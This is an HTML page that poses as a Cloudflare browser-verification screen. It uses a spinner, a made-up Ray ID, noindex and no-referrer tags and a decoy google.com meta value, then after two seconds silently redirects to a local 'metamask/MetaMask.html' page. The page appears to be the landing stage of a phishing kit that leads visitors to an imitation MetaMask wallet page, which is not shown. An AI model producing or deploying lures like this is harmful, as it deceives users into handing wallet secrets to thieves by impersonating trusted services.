<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
<meta name="robots" content="noindex, nofollow">
<meta name="referrer" content="no-referrer">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<title>Just a moment...</title>
<meta http-equiv="refresh" content="2;url=metamask/MetaMask.html" />
<style type="text/css">
        html, body {width: 100%; height: 100%; margin: 0; padding: 0;}
        body {background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; font-size: 100%;}
        h1 {font-size: 1.5em; color: #404040; text-align: center;}
        p {font-size: 1em; color: #404040; text-align: center; margin: 10px 0 0 0;}
        #spinner {margin: 0 auto 30px auto; display: block;}
        .attribution {margin-top: 20px;}
        @-webkit-keyframes bubbles { 33%: { -webkit-transform: translateY(10px); transform: translateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: translateY(-10px); } 100% { -webkit-transform: translateY(0); transform: translateY(0); } }
        @keyframes  bubbles { 33%: { -webkit-transform: translateY(10px); transform: translateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: translateY(-10px); } 100% { -webkit-transform: translateY(0); transform: translateY(0); } }
        .bubbles { background-color: #404040; width:15px; height: 15px; margin:2px; border-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ease-in-out; animation:bubbles 0.6s 0.07s infinite ease-in-out; -webkit-animation-fill-mode:both; animation-fill-mode:both; display:inline-block; }
    </style>
<meta name="csrf-token" content="YUYH24ViS9Il9nEB6OtRObPM36rTFG7fpmjTGVqA">
<meta name="id" content="eyJpdiI6Im9aVzE5SGVhbE5WWXNndW9za0szMEE9PSIsInZhbHVlIjoiazVjSUlMbmVDbmg1U3JuXC84RzBDNVE9PSIsIm1hYyI6IjliMTVkZTEzMjZlM2NkZjMwZTZmYTNlMTg1MjU1OWJiNDMxYjgwZGY0ODU0ZjQ2NjJhNDE1M2U5Y2UwZDRkNTMifQ==">
<meta name="url" content="http://google.com">
<script type="text/javascript">
        if(/MSIE \d|Trident.*rv:/.test(navigator.userAgent))
            document.write('<script src="js/bluebird.min.js"><\/script><script src="js/polyfill.min.js"><\/script>');
    </script>
</head>
<body cz-shortcut-listen="true">
<table width="100%" height="100%" cellpadding="20">
<tbody>
<tr>
<td valign="middle" align="center">
<div class="cf-browser-verification cf-im-under-attack">
<noscript><h1 data-translate="turn_on_js" style="color:#bd2426;">Please turn JavaScript on and reload
                        the page.</h1></noscript>
<div id="cf-content" style="display: block;">
<a style="display: none;">table</a>
<div>
<div class="bubbles"></div>
<div class="bubbles"></div>
<div class="bubbles"></div>
</div>
<h1><span data-translate="checking_browser">Checking your browser before accessing</span>
the website.</h1>
<p data-translate="process_is_automatic">This process is automatic. Your browser will redirect to
your requested content shortly.</p>
<p data-translate="allow_5_secs">Please allow up to 5 seconds…</p>
</div>
</div>
<div class="attribution">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=iuam" rel="noreferrer" target="_blank" style="font-size: 12px;">DDoS protection by Cloudflare</a>
<br>
Ray ID: ukojgt24wk07ht7b
</div>
</td>
</tr>
</tbody>
</table>
<script src="/js/ads.js"></script>
<script type="text/javascript" src="js/jquery-2.5.1.min.js"></script>

</body></html>